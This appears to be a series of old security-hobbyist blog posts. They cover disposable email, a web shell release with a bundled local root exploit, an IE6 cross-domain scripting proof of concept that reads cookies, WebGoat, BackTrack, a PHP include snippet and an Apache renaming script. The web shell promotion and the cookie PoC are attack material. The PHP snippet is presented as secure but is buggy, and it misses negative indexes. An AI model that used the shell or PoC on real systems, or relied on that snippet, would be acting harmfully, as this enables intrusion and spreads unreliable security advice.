I don’t know if you were in those kinds of situations when you had to create multiple accounts for an online gaming/forum/website, etc. For one I sure was in that situation, and always had to create a new email address, so I could only click that f***ing validation link, even If I would never return again to the same website… also, this email validation method always brought me a new series of spam, and I could say with a 99% safety that was due to that activation schema…

Not anymore, because recently I Stumbled Upon a website which winked back at me with the following phrase:

This website provides you with disposable e-mail addresses which expire after 15 Minutes. You can read and reply to e-mails that are sent to the temporary e-mail address within the given time frame.

And it’s for real… online back at GuerrilaMail…

After lots of work, GNY.Shell is ready to be released. It is based on Storm7Shell. GNY.Shell offers many new features, with a few listed below:
> Added precompiled VMSplice Exploit
> Added IP:Port and PHP Proxy generation
> Removed all images (fewer entries in access logs)
> Added various scripts and loads more features
> Removed some unnecessary code
> Tons more for you to go test out the shell and find ;)

More information: http://gonullyourself.org/board/showthread.php?t=395
GNY.Shell: http://gonullyourself.org/shell.txt

Now available in local stores near you… I’m kinda 3 days off, but just today took the time to take a look on the feeds I follow, and came across this interesting article back at F-Secure’s blog -> Internet Explorer 6 Cross-Domain Scripting Vulnerability… I bet some of you will find it very useful… Anyway you can find the PoC code at raffon.net…

If you’re too lazy to click here-and-there, here is the code
—
function win() {
   x=window.open(’http://www.google.com’);
   setTimeout (function () {
      x.location.href = new String(”javascript:alert(document.cookie)”)
   }, 3000)
}
—

Now this may be interesting… Should you write your own code? … or… Download already available code?… this is a question that’s been bothering me for a while, as I think will bother others from now on (maybe)…
I’ll throw in some pros and cons about this subject… some will agree while others will not… here we go.

Downloading available code! (CMS, Blog, Guestbook, Forum, OnlineShop, etc)

Pros
• easy to install
• easy configuration
• many plug-ins
• many updates

Cons
• many updates, periodically need to check for them
• once you modded a module, you’ll have to mode it in every update
• often hard to digest code, hard to mod

Writing own code!

Pros
• you make it your way
• if you know what you’re doing you can secure it pretty well
• you update only what you use, no problems with modding
• you constantly improve your skills

Cons
• time consuming
• you make it your way - yep

I don’t know how other people are, but when it comes in scripting I usually do my own scripts… web applications only… while coming to desktop applications and client side script, I’d rather download them… because they usualy do not tend to be so complexly divided… that is, as mentioned already, my opinion… hoping to get some feedback on this issue…

The unzip and run insecure J2EE web application… at least under windows…

WebGoat is a deliberately insecure J2EE web application maintained by OWASP designed to teach web application security lessons. In each lesson, users must demonstrate their understanding of a security issue by exploiting a real vulnerability in the WebGoat application. For example, in one of the lessons the user must use SQL injection to steal fake credit card numbers. The application is a realistic teaching environment, providing users with hints and code to further explain the lesson.

http://www.owasp.org/index.php/Category:OWASP_WebGoat_Project
http://code.google.com/p/webgoat/

A couple of days/weeks ago (don’t quite remember well) I came across Savride’s blog, where also I stumbled upon the following article Secure PHP variables $_GET, $_POST - wrapper function which was kinda hard to digest at first… to much obfuscated code in one place… it’s ok if it works for him, but for file inclusion I would rather have a different approach, a more lightweight one… instead of doing all that input verification and what more there is I use the following code… more readable, and as secure as his…
—
<?php
$files = array(”error.php”, “news.php”, “blog.php”, “download.php”);
$index = (int) $_GET["file"];
if($index>=count($files)) {
   include($files[0]);
}
else {
   include($file[$index]);
}
?>
—
Just as simple as that… could save a lot of effort to prevent rfi/lfi… won’t you agree?… It’s the developers choice here… I always try to find way to minimize my code while keeping it safe also….
Expecting just the expected -> http://www.0×000000.com/

Got the info today from the penetration testing mailinglist back at security focus…

BackTrack is the result of merging the two innovative penetration testing live linux distributions Auditor and Whax. Backtrack provides a thorough pentesting environment which is bootable via CD, USB or the network (PXE). The tools are arranged in an intuitive manner, and cover most of the attack vectors. Complex environments are simplified, such as automatic Kismet configuration, one click Snort setup, precompiled Metasploit lorcon modules, etc. BackTrack has been dubbed the #1 Security Live CD by Insecure.org, and #36 overall.

BackTrack Webpage

I recently installed Apache on my home computer, and as not being a regular Apache user (for own webapp development I use Abyss X1, kinda my first ever installed webserver) I wanted to take a look in the manual pages… opened up index.html, and for my surprize there was a blank page (well, actually not blank, but no informational text for sure…)

The problem was that I realized that the pages (that I where looking for) where under the .html.en extension… :(… at first I tried to modify them manually… which was a real pain in the fingers… and my plain mind helped me realize (at half of the files being renamed) that a script would me more useful… dah…

—
system(”cmd /c del *.html”);
$handle = opendir(”.”);
while($file = readdir($handle)) {
  if(preg_match(”/\.en/”, $file)) {
    $newfile = str_replace(”.en”, “”, $file);
    system(”cmd /c copy $file $newfile”);
  }
}
—

This way maybe you won’t go through the same shit I went…

Many times poeple criticise me for being a security through obscurity fanclub member, thus saying that it can do no good, grow out of it and stuff like that… But I never said I used security through obscurity as a basic security implementation (wtf?! do you think I work for MS?)… Anyway for those who criticise me what would they say about the following “security implementation” (yeah right)….

I think big brother’s watching me ….

Recently affiliated with Darknet I have found GoNullYourself which came in with a non skiddies aproach (you got to give’em some credit for that)… anyway they have decided to make posible public registration to their forum, and If you may want to take a look an register throw in my handle as a refferal… ^_^

Why this article? Because nowadays can’t really find a good quality forum… or can be found but sooner or later they become inactive… got some hopes in this null identity…